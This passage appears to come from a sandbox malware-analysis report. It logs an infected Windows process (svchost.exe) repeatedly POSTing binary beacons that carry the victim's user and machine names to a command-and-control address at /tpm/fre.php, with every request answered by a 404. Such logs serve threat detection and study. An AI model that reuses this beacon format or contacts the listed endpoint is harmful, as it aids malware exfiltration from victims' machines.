                                                              Jan 7, 2025 11:02:51.916358948 CET153OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 35 00 33 00 36 00 37 00 32 00 30 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00
                                                              Data Ascii: (ckav.rualfons536720ALFONS-PC0FDD42EE188E931437F4FBE2C
                                                              Jan 7, 2025 11:02:52.460309982 CET271INHTTP/1.0 404 Not Found
                                                              Date: Tue, 07 Jan 2025 10:02:52 GMT
                                                              Server: Apache/2.4.38 (Win64) OpenSSL/1.0.2q PHP/5.6.40
                                                              X-Powered-By: PHP/5.6.40
                                                              Status: 404 Not Found
                                                              Content-Length: 23
                                                              Connection: close
                                                              Content-Type: text/html; charset=UTF-8
                                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                              Data Ascii: File not found.


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              80192.168.2.550020172.245.123.11806784C:\Windows\SysWOW64\svchost.exe
                                                              TimestampBytes transferredDirectionData
                                                              Jan 7, 2025 11:02:52.613785028 CET238OUTPOST /tpm/fre.php HTTP/1.0
                                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                              Host: 172.245.123.11
                                                              Accept: */*
                                                              Content-Type: application/octet-stream
                                                              Content-Encoding: binary
                                                              Content-Key: D3AFB906
                                                              Content-Length: 153
                                                              Connection: close
                                                              Jan 7, 2025 11:02:52.618643999 CET153OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 35 00 33 00 36 00 37 00 32 00 30 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00
                                                              Data Ascii: (ckav.rualfons536720ALFONS-PC0FDD42EE188E931437F4FBE2C
                                                              Jan 7, 2025 11:02:53.129738092 CET271INHTTP/1.0 404 Not Found
                                                              Date: Tue, 07 Jan 2025 10:02:53 GMT
                                                              Server: Apache/2.4.38 (Win64) OpenSSL/1.0.2q PHP/5.6.40
                                                              X-Powered-By: PHP/5.6.40
                                                              Status: 404 Not Found
                                                              Content-Length: 23
                                                              Connection: close
                                                              Content-Type: text/html; charset=UTF-8
                                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                              Data Ascii: File not found.


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              81192.168.2.550026172.245.123.11806784C:\Windows\SysWOW64\svchost.exe
                                                              TimestampBytes transferredDirectionData
                                                              Jan 7, 2025 11:02:53.268292904 CET238OUTPOST /tpm/fre.php HTTP/1.0
                                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                              Host: 172.245.123.11
                                                              Accept: */*
                                                              Content-Type: application/octet-stream
                                                              Content-Encoding: binary
                                                              Content-Key: D3AFB906
                                                              Content-Length: 153
                                                              Connection: close
                                                              Jan 7, 2025 11:02:53.273171902 CET153OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 35 00 33 00 36 00 37 00 32 00 30 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00
                                                              Data Ascii: (ckav.rualfons536720ALFONS-PC0FDD42EE188E931437F4FBE2C
                                                              Jan 7, 2025 11:02:53.777441978 CET271INHTTP/1.0 404 Not Found
                                                              Date: Tue, 07 Jan 2025 10:02:53 GMT
                                                              Server: Apache/2.4.38 (Win64) OpenSSL/1.0.2q PHP/5.6.40
                                                              X-Powered-By: PHP/5.6.40
                                                              Status: 404 Not Found
                                                              Content-Length: 23
                                                              Connection: close
                                                              Content-Type: text/html; charset=UTF-8
                                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                              Data Ascii: File not found.


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              82192.168.2.550032172.245.123.11806784C:\Windows\SysWOW64\svchost.exe
                                                              TimestampBytes transferredDirectionData
                                                              Jan 7, 2025 11:02:53.931938887 CET238OUTPOST /tpm/fre.php HTTP/1.0
                                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                              Host: 172.245.123.11
                                                              Accept: */*
                                                              Content-Type: application/octet-stream
                                                              Content-Encoding: binary
                                                              Content-Key: D3AFB906
                                                              Content-Length: 153
                                                              Connection: close
                                                              Jan 7, 2025 11:02:53.936803102 CET153OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 35 00 33 00 36 00 37 00 32 00 30 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00
                                                              Data Ascii: (ckav.rualfons536720ALFONS-PC0FDD42EE188E931437F4FBE2C
                                                              Jan 7, 2025 11:02:54.694585085 CET271INHTTP/1.0 404 Not Found
                                                              Date: Tue, 07 Jan 2025 10:02:54 GMT
                                                              Server: Apache/2.4.38 (Win64) OpenSSL/1.0.2q PHP/5.6.40
                                                              X-Powered-By: PHP/5.6.40
                                                              Status: 404 Not Found
                                                              Content-Length: 23
                                                              Connection: close
                                                              Content-Type: text/html; charset=UTF-8
                                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                              Data Ascii: File not found.
                                                              Jan 7, 2025 11:02:54.695349932 CET271INHTTP/1.0 404 Not Found
                                                              Date: Tue, 07 Jan 2025 10:02:54 GMT
                                                              Server: Apache/2.4.38 (Win64) OpenSSL/1.0.2q PHP/5.6.40
                                                              X-Powered-By: PHP/5.6.40
                                                              Status: 404 Not Found
                                                              Content-Length: 23
                                                              Connection: close
                                                              Content-Type: text/html; charset=UTF-8
                                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                              Data Ascii: File not found.


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              83192.168.2.550038172.245.123.11806784C:\Windows\SysWOW64\svchost.exe
                                                              TimestampBytes transferredDirectionData
                                                              Jan 7, 2025 11:02:55.166923046 CET238OUTPOST /tpm/fre.php HTTP/1.0
                                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                              Host: 172.245.123.11
                                                              Accept: */*
                                                              Content-Type: application/octet-stream
                                                              Content-Encoding: binary
                                                              Content-Key: D3AFB906
                                                              Content-Length: 153
                                                              Connection: close
                                                              Jan 7, 2025 11:02:55.171758890 CET153OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 35 00 33 00 36 00 37 00 32 00 30 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00
                                                              Data Ascii: (ckav.rualfons536720ALFONS-PC0FDD42EE188E931437F4FBE2C
                                                              Jan 7, 2025 11:02:55.670371056 CET271INHTTP/1.0 404 Not Found
                                                              Date: Tue, 07 Jan 2025 10:02:55 GMT
                                                              Server: Apache/2.4.38 (Win64) OpenSSL/1.0.2q PHP/5.6.40
                                                              X-Powered-By: PHP/5.6.40
                                                              Status: 404 Not Found
                                                              Content-Length: 23
                                                              Connection: close
                                                              Content-Type: text/html; charset=UTF-8
                                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                              Data Ascii: File not found.


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              84192.168.2.550044172.245.123.11806784C:\Windows\SysWOW64\svchost.exe
                                                              TimestampBytes transferredDirectionData
                                                              Jan 7, 2025 11:02:55.824816942 CET238OUTPOST /tpm/fre.php HTTP/1.0
                                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                              Host: 172.245.123.11
                                                              Accept: */*
                                                              Content-Type: application/octet-stream
                                                              Content-Encoding: binary
                                                              Content-Key: D3AFB906
                                                              Content-Length: 153
                                                              Connection: close
                                                              Jan 7, 2025 11:02:55.829664946 CET153OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 35 00 33 00 36 00 37 00 32 00 30 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00
                                                              Data Ascii: (ckav.rualfons536720ALFONS-PC0FDD42EE188E931437F4FBE2C
                                                              Jan 7, 2025 11:02:56.378081083 CET271INHTTP/1.0 404 Not Found
                                                              Date: Tue, 07 Jan 2025 10:02:56 GMT
                                                              Server: Apache/2.4.38 (Win64) OpenSSL/1.0.2q PHP/5.6.40
                                                              X-Powered-By: PHP/5.6.40
                                                              Status: 404 Not Found
                                                              Content-Length: 23
                                                              Connection: close
                                                              Content-Type: text/html; charset=UTF-8
                                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                              Data Ascii: File not found.


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              85192.168.2.550050172.245.123.11806784C:\Windows\SysWOW64\svchost.exe
                                                              TimestampBytes transferredDirectionData
                                                              Jan 7, 2025 11:02:56.552958965 CET238OUTPOST /tpm/fre.php HTTP/1.0
                                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                              Host: 172.245.123.11
                                                              Accept: */*
                                                              Content-Type: application/octet-stream
                                                              Content-Encoding: binary
                                                              Content-Key: D3AFB906
                                                              Content-Length: 153
                                                              Connection: close
                                                              Jan 7, 2025 11:02:56.557892084 CET153OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 35 00 33 00 36 00 37 00 32 00 30 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00
                                                              Data Ascii: (ckav.rualfons536720ALFONS-PC0FDD42EE188E931437F4FBE2C
                                                              Jan 7, 2025 11:02:57.059457064 CET271INHTTP/1.0 404 Not Found
                                                              Date: Tue, 07 Jan 2025 10:02:56 GMT
                                                              Server: Apache/2.4.38 (Win64) OpenSSL/1.0.2q PHP/5.6.40
                                                              X-Powered-By: PHP/5.6.40
                                                              Status: 404 Not Found
                                                              Content-Length: 23
                                                              Connection: close
                                                              Content-Type: text/html; charset=UTF-8
                                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                              Data Ascii: File not found.


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              86192.168.2.550055172.245.123.11806784C:\Windows\SysWOW64\svchost.exe
                                                              TimestampBytes transferredDirectionData
                                                              Jan 7, 2025 11:02:57.229439974 CET238OUTPOST /tpm/fre.php HTTP/1.0
                                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                              Host: 172.245.123.11
                                                              Accept: */*
                                                              Content-Type: application/octet-stream
                                                              Content-Encoding: binary
                                                              Content-Key: D3AFB906
                                                              Content-Length: 153
                                                              Connection: close
                                                              Jan 7, 2025 11:02:57.234365940 CET153OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 35 00 33 00 36 00 37 00 32 00 30 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00
                                                              Data Ascii: (ckav.rualfons536720ALFONS-PC0FDD42EE188E931437F4FBE2C
                                                              Jan 7, 2025 11:02:57.746912003 CET271INHTTP/1.0 404 Not Found
                                                              Date: Tue, 07 Jan 2025 10:02:57 GMT
                                                              Server: Apache/2.4.38 (Win64) OpenSSL/1.0.2q PHP/5.6.40
                                                              X-Powered-By: PHP/5.6.40
                                                              Status: 404 Not Found
                                                              Content-Length: 23
                                                              Connection: close
                                                              Content-Type: text/html; charset=UTF-8
                                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                              Data Ascii: File not found.


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              87192.168.2.550061172.245.123.11806784C:\Windows\SysWOW64\svchost.exe
                                                              TimestampBytes transferredDirectionData
                                                              Jan 7, 2025 11:02:57.900012016 CET238OUTPOST /tpm/fre.php HTTP/1.0
                                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                              Host: 172.245.123.11
                                                              Accept: */*
                                                              Content-Type: application/octet-stream
                                                              Content-Encoding: binary
                                                              Content-Key: D3AFB906
                                                              Content-Length: 153
                                                              Connection: close
                                                              Jan 7, 2025 11:02:57.904891014 CET153OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 35 00 33 00 36 00 37 00 32 00 30 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00
                                                              Data Ascii: (ckav.rualfons536720ALFONS-PC0FDD42EE188E931437F4FBE2C
                                                              Jan 7, 2025 11:02:58.413503885 CET271INHTTP/1.0 404 Not Found
                                                              Date: Tue, 07 Jan 2025 10:02:58 GMT
                                                              Server: Apache/2.4.38 (Win64) OpenSSL/1.0.2q PHP/5.6.40
                                                              X-Powered-By: PHP/5.6.40
                                                              Status: 404 Not Found
                                                              Content-Length: 23
                                                              Connection: close
                                                              Content-Type: text/html; charset=UTF-8
                                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                              Data Ascii: File not found.


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              88192.168.2.550066172.245.123.11806784C:\Windows\SysWOW64\svchost.exe
                                                              TimestampBytes transferredDirectionData
                                                              Jan 7, 2025 11:02:58.569350958 CET238OUTPOST /tpm/fre.php HTTP/1.0
                                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                              Host: 172.245.123.11
                                                              Accept: */*
                                                              Content-Type: application/octet-stream
                                                              Content-Encoding: binary
                                                              Content-Key: D3AFB906
                                                              Content-Length: 153
                                                              Connection: close
                                                              Jan 7, 2025 11:02:58.574188948 CET153OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 35 00 33 00 36 00 37 00 32 00 30 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00
                                                              Data Ascii: (ckav.rualfons536720ALFONS-PC0FDD42EE188E931437F4FBE2C
                                                              Jan 7, 2025 11:02:59.073698997 CET271INHTTP/1.0 404 Not Found
                                                              Date: Tue, 07 Jan 2025 10:02:58 GMT
                                                              Server: Apache/2.4.38 (Win64) OpenSSL/1.0.2q PHP/5.6.40
                                                              X-Powered-By: PHP/5.6.40
                                                              Status: 404 Not Found
                                                              Content-Length: 23
                                                              Connection: close
                                                              Content-Type: text/html; charset=UTF-8
                                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                              Data Ascii: File not found.


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              89192.168.2.550067172.245.123.11806784C:\Windows\SysWOW64\svchost.exe
                                                              TimestampBytes transferredDirectionData
                                                              Jan 7, 2025 11:02:59.224350929 CET238OUTPOST /tpm/fre.php HTTP/1.0
                                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                              Host: 172.245.123.11
                                                              Accept: */*
                                                              Content-Type: application/octet-stream
                                                              Content-Encoding: binary
                                                              Content-Key: D3AFB906
                                                              Content-Length: 153
                                                              Connection: close
                                                              Jan 7, 2025 11:02:59.229111910 CET153OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 35 00 33 00 36 00 37 00 32 00 30 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00
                                                              Data Ascii: (ckav.rualfons536720ALFONS-PC0FDD42EE188E931437F4FBE2C
                                                              Jan 7, 2025 11:02:59.743603945 CET271INHTTP/1.0 404 Not Found
                                                              Date: Tue, 07 Jan 2025 10:02:59 GMT
                                                              Server: Apache/2.4.38 (Win64) OpenSSL/1.0.2q PHP/5.6.40
                                                              X-Powered-By: PHP/5.6.40
                                                              Status: 404 Not Found
                                                              Content-Length: 23
                                                              Connection: close
                                                              Content-Type: text/html; charset=UTF-8
                                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                              Data Ascii: File not found.


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              90192.168.2.550068172.245.123.11806784C:\Windows\SysWOW64\svchost.exe
                                                              TimestampBytes transferredDirectionData
                                                              Jan 7, 2025 11:02:59.895684958 CET238OUTPOST /tpm/fre.php HTTP/1.0
                                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                              Host: 172.245.123.11
                                                              Accept: */*
                                                              Content-Type: application/octet-stream
                                                              Content-Encoding: binary
                                                              Content-Key: D3AFB906
                                                              Content-Length: 153
                                                              Connection: close
                                                              Jan 7, 2025 11:02:59.900572062 CET153OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 35 00 33 00 36 00 37 00 32 00 30 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00
                                                              Data Ascii: (ckav.rualfons536720ALFONS-PC0FDD42EE188E931437F4FBE2C
                                                              Jan 7, 2025 11:03:00.408051014 CET271INHTTP/1.0 404 Not Found
                                                              Date: Tue, 07 Jan 2025 10:03:00 GMT
                                                              Server: Apache/2.4.38 (Win64) OpenSSL/1.0.2q PHP/5.6.40
                                                              X-Powered-By: PHP/5.6.40
                                                              Status: 404 Not Found
                                                              Content-Length: 23
                                                              Connection: close
                                                              Content-Type: text/html; charset=UTF-8
                                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                              Data Ascii: File not found.


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              91192.168.2.550069172.245.123.11806784C:\Windows\SysWOW64\svchost.exe
                                                              TimestampBytes transferredDirectionData
                                                              Jan 7, 2025 11:03:00.553661108 CET238OUTPOST /tpm/fre.php HTTP/1.0
                                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                              Host: 172.245.123.11
                                                              Accept: */*
                                                              Content-Type: application/octet-stream
                                                              Content-Encoding: binary
                                                              Content-Key: D3AFB906
                                                              Content-Length: 153
                                                              Connection: close
                                                              Jan 7, 2025 11:03:00.558516979 CET153OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 35 00 33 00 36 00 37 00 32 00 30 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00
                                                              Data Ascii: (ckav.rualfons536720ALFONS-PC0FDD42EE188E931437F4FBE2C
                                                              Jan 7, 2025 11:03:01.052876949 CET271INHTTP/1.0 404 Not Found
                                                              Date: Tue, 07 Jan 2025 10:03:00 GMT
                                                              Server: Apache/2.4.38 (Win64) OpenSSL/1.0.2q PHP/5.6.40
                                                              X-Powered-By: PHP/5.6.40
                                                              Status: 404 Not Found
                                                              Content-Length: 23
                                                              Connection: close
                                                              Content-Type: text/html; charset=UTF-8
                                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                              Data Ascii: File not found.


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              92192.168.2.550070172.245.123.11806784C:\Windows\SysWOW64\svchost.exe
                                                              TimestampBytes transferredDirectionData
                                                              Jan 7, 2025 11:03:01.207179070 CET238OUTPOST /tpm/fre.php HTTP/1.0
                                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                              Host: 172.245.123.11
                                                              Accept: */*
                                                              Content-Type: application/octet-stream
                                                              Content-Encoding: binary
                                                              Content-Key: D3AFB906
                                                              Content-Length: 153
                                                              Connection: close
                                                              Jan 7, 2025 11:03:01.212085009 CET153OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 35 00 33 00 36 00 37 00 32 00 30 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00
                                                              Data Ascii: (ckav.rualfons536720ALFONS-PC0FDD42EE188E931437F4FBE2C
                                                              Jan 7, 2025 11:03:01.734214067 CET271INHTTP/1.0 404 Not Found
                                                              Date: Tue, 07 Jan 2025 10:03:01 GMT
                                                              Server: Apache/2.4.38 (Win64) OpenSSL/1.0.2q PHP/5.6.40
                                                              X-Powered-By: PHP/5.6.40
                                                              Status: 404 Not Found
                                                              Content-Length: 23
                                                              Connection: close
                                                              Content-Type: text/html; charset=UTF-8
                                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                              Data Ascii: File not found.


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              93192.168.2.550071172.245.123.11806784C:\Windows\SysWOW64\svchost.exe
                                                              TimestampBytes transferredDirectionData
                                                              Jan 7, 2025 11:03:01.895044088 CET238OUTPOST /tpm/fre.php HTTP/1.0
                                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                              Host: 172.245.123.11
                                                              Accept: */*
                                                              Content-Type: application/octet-stream
                                                              Content-Encoding: binary
                                                              Content-Key: D3AFB906
                                                              Content-Length: 153
                                                              Connection: close
                                                              Jan 7, 2025 11:03:01.900649071 CET153OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 35 00 33 00 36 00 37 00 32 00 30 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00
                                                              Data Ascii: (ckav.rualfons536720ALFONS-PC0FDD42EE188E931437F4FBE2C
                                                              Jan 7, 2025 11:03:02.402343988 CET271INHTTP/1.0 404 Not Found
                                                              Date: Tue, 07 Jan 2025 10:03:02 GMT
                                                              Server: Apache/2.4.38 (Win64) OpenSSL/1.0.2q PHP/5.6.40
                                                              X-Powered-By: PHP/5.6.40
                                                              Status: 404 Not Found
                                                              Content-Length: 23
                                                              Connection: close
                                                              Content-Type: text/html; charset=UTF-8
                                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                              Data Ascii: File not found.


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              94192.168.2.550072172.245.123.11806784C:\Windows\SysWOW64\svchost.exe
                                                              TimestampBytes transferredDirectionData
                                                              Jan 7, 2025 11:03:02.670571089 CET238OUTPOST /tpm/fre.php HTTP/1.0
                                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                              Host: 172.245.123.11
                                                              Accept: */*
                                                              Content-Type: application/octet-stream
                                                              Content-Encoding: binary
                                                              Content-Key: D3AFB906
                                                              Content-Length: 153
                                                              Connection: close
                                                              Jan 7, 2025 11:03:02.675530910 CET153OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 35 00 33 00 36 00 37 00 32 00 30 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00
                                                              Data Ascii: (ckav.rualfons536720ALFONS-PC0FDD42EE188E931437F4FBE2C
                                                              Jan 7, 2025 11:03:03.187813044 CET271INHTTP/1.0 404 Not Found
                                                              Date: Tue, 07 Jan 2025 10:03:03 GMT
                                                              Server: Apache/2.4.38 (Win64) OpenSSL/1.0.2q PHP/5.6.40
                                                              X-Powered-By: PHP/5.6.40
                                                              Status: 404 Not Found
                                                              Content-Length: 23
                                                              Connection: close
                                                              Content-Type: text/html; charset=UTF-8
                                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                              Data Ascii: File not found.


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              95192.168.2.550073172.245.123.11806784C:\Windows\SysWOW64\svchost.exe
                                                              TimestampBytes transferredDirectionData
                                                              Jan 7, 2025 11:03:03.331244946 CET238OUTPOST /tpm/fre.php HTTP/1.0
                                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                              Host: 172.245.123.11
                                                              Accept: */*
                                                              Content-Type: application/octet-stream
                                                              Content-Encoding: binary
                                                              Content-Key: D3AFB906
                                                              Content-Length: 153
                                                              Connection: close
                                                              Jan 7, 2025 11:03:03.337291002 CET153OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 35 00 33 00 36 00 37 00 32 00 30 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00
                                                              Data Ascii: (ckav.rualfons536720ALFONS-PC0FDD42EE188E931437F4FBE2C
                                                              Jan 7, 2025 11:03:03.861639023 CET271INHTTP/1.0 404 Not Found
                                                              Date: Tue, 07 Jan 2025 10:03:03 GMT
                                                              Server: Apache/2.4.38 (Win64) OpenSSL/1.0.2q PHP/5.6.40
                                                              X-Powered-By: PHP/5.6.40
                                                              Status: 404 Not Found
                                                              Content-Length: 23
                                                              Connection: close
                                                              Content-Type: text/html; charset=UTF-8
                                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                              Data Ascii: File not found.


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              96192.168.2.550074172.245.123.11806784C:\Windows\SysWOW64\svchost.exe
                                                              TimestampBytes transferredDirectionData
                                                              Jan 7, 2025 11:03:04.008693933 CET238OUTPOST /tpm/fre.php HTTP/1.0
                                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                              Host: 172.245.123.11
                                                              Accept: */*
                                                              Content-Type: application/octet-stream
                                                              Content-Encoding: binary
                                                              Content-Key: D3AFB906
                                                              Content-Length: 153
                                                              Connection: close
                                                              Jan 7, 2025 11:03:04.013533115 CET153OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 35 00 33 00 36 00 37 00 32 00 30 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00
                                                              Data Ascii: (ckav.rualfons536720ALFONS-PC0FDD42EE188E931437F4FBE2C
                                                              Jan 7, 2025 11:03:04.532922983 CET271INHTTP/1.0 404 Not Found
                                                              Date: Tue, 07 Jan 2025 10:03:04 GMT
                                                              Server: Apache/2.4.38 (Win64) OpenSSL/1.0.2q PHP/5.6.40
                                                              X-Powered-By: PHP/5.6.40
                                                              Status: 404 Not Found
                                                              Content-Length: 23
                                                              Connection: close
                                                              Content-Type: text/html; charset=UTF-8
                                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                              Data Ascii: File not found.


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              97192.168.2.550075172.245.123.11806784C:\Windows\SysWOW64\svchost.exe
                                                              TimestampBytes transferredDirectionData
                                                              Jan 7, 2025 11:03:04.675008059 CET238OUTPOST /tpm/fre.php HTTP/1.0
                                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                              Host: 172.245.123.11
                                                              Accept: */*
                                                              Content-Type: application/octet-stream
